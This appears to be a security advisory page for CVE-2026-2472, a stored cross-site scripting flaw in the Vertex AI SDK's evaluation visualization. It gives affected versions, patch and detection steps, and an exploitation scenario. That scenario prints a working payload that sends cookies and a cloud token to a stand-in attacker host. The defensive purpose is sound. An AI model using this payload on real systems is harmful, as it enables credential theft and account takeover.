If your ML engineers use Vertex AI SDK's evaluation visualization in Jupyter or Colab, upgrade google-cloud-aiplatform to 1.131.0 immediately. An attacker who can influence model evaluation inputs or dataset content can execute arbitrary JavaScript in your engineers' browser sessions, enabling cloud credential theft and account takeover. Risk is highest for teams evaluating LLMs against external, user-supplied, or third-party data sources—a public PoC already exists on GitHub.
Risk Assessment
High business impact despite low EPSS (0.00064) and no CISA KEV inclusion. Jupyter and Colab environments are disproportionately dangerous XSS targets: they routinely hold Google Cloud OAuth tokens, service account keys, and direct access to production data pipelines and model artifacts. The attack requires no authentication—only the ability to influence evaluation dataset content or model outputs, which is achievable via adversarial prompts, poisoned datasets, or indirect prompt injection into evaluated models. A public PoC (github.com/JoshuaProvoste/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud) lowers the exploitation bar further. No confirmed active exploitation in the wild as of analysis date.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| google-cloud-aiplatform | pip | >= 1.98.0, < 1.131.0 | 1.131.0 |
Do you use google-cloud-aiplatform? You're affected.
Severity & Risk
Recommended Action
6 steps-
PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 — pip install --upgrade google-cloud-aiplatform. Verify with pip show google-cloud-aiplatform.
-
WORKAROUND
Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data.
-
DETECTION
Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization.
-
INPUT CONTROL
Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation.
-
CREDENTIAL HYGIENE
If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions.
-
SCOPE
Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-2472?
If your ML engineers use Vertex AI SDK's evaluation visualization in Jupyter or Colab, upgrade google-cloud-aiplatform to 1.131.0 immediately. An attacker who can influence model evaluation inputs or dataset content can execute arbitrary JavaScript in your engineers' browser sessions, enabling cloud credential theft and account takeover. Risk is highest for teams evaluating LLMs against external, user-supplied, or third-party data sources—a public PoC already exists on GitHub.
Is CVE-2026-2472 actively exploited?
No confirmed active exploitation of CVE-2026-2472 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-2472?
1. PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 — pip install --upgrade google-cloud-aiplatform. Verify with pip show google-cloud-aiplatform. 2. WORKAROUND: Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data. 3. DETECTION: Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization. 4. INPUT CONTROL: Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation. 5. CREDENTIAL HYGIENE: If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions. 6. SCOPE: Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.
What systems are affected by CVE-2026-2472?
This vulnerability affects the following AI/ML architecture patterns: model evaluation pipelines, AI development workspaces, Vertex AI workflows, Jupyter and Colab ML environments, LLM evaluation frameworks, automated ML pipelines with visualization.
What is the CVSS score for CVE-2026-2472?
No CVSS score has been assigned yet.
Technical Details
NVD Description
Stored Cross-Site Scripting (XSS) in the _genai/_evals_visualization component of Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions from 1.98.0 up to (but not including) 1.131.0 allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment via injecting script escape sequences into model evaluation results or dataset JSON data.
Exploitation Scenario
An attacker targets a company running LLM evaluations on Vertex AI. They submit an adversarial evaluation dataset entry with a JSON string value containing a stored XSS payload: '<img src=x onerror=fetch("https://attacker.com/exfil?t="+btoa(document.cookie+localStorage.getItem("gcloud_token")))>'. The poisoned dataset is fed into a Vertex AI model evaluation job. When the ML engineer opens the _genai/_evals_visualization dashboard in Jupyter to review results, the payload fires silently, exfiltrating the engineer's Google Cloud OAuth token and session cookies to the attacker. The attacker uses the stolen token to authenticate to GCS, enumerate Vertex AI model artifacts, and pivot to Cloud SQL or BigQuery—all without triggering authentication alerts, since they are using a legitimate token.
Weaknesses (CWE)
References
- docs.cloud.google.com/support/bulletins
- github.com/JoshuaProvoste/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud
- github.com/advisories/GHSA-qv8j-hgpc-vrq8
- github.com/googleapis/python-aiplatform/commit/8a00d43dbd24e95dbab6ea32c63ce0a5a1849480
- github.com/googleapis/python-aiplatform/releases/tag/v1.131.0
- nvd.nist.gov/vuln/detail/CVE-2026-2472
Timeline
Related Vulnerabilities
CVE-2023-3765 10.0 MLflow: path traversal allows arbitrary file read
Same attack type: Supply Chain CVE-2025-5120 10.0 smolagents: sandbox escape enables unauthenticated RCE
Same attack type: Supply Chain CVE-2025-2828 10.0 LangChain RequestsToolkit: SSRF exposes cloud metadata
Same attack type: Data Extraction CVE-2025-53767 10.0 Azure OpenAI: SSRF EoP, no auth required (CVSS 10)
Same attack type: Data Extraction CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same attack type: Supply Chain
AI Threat Alert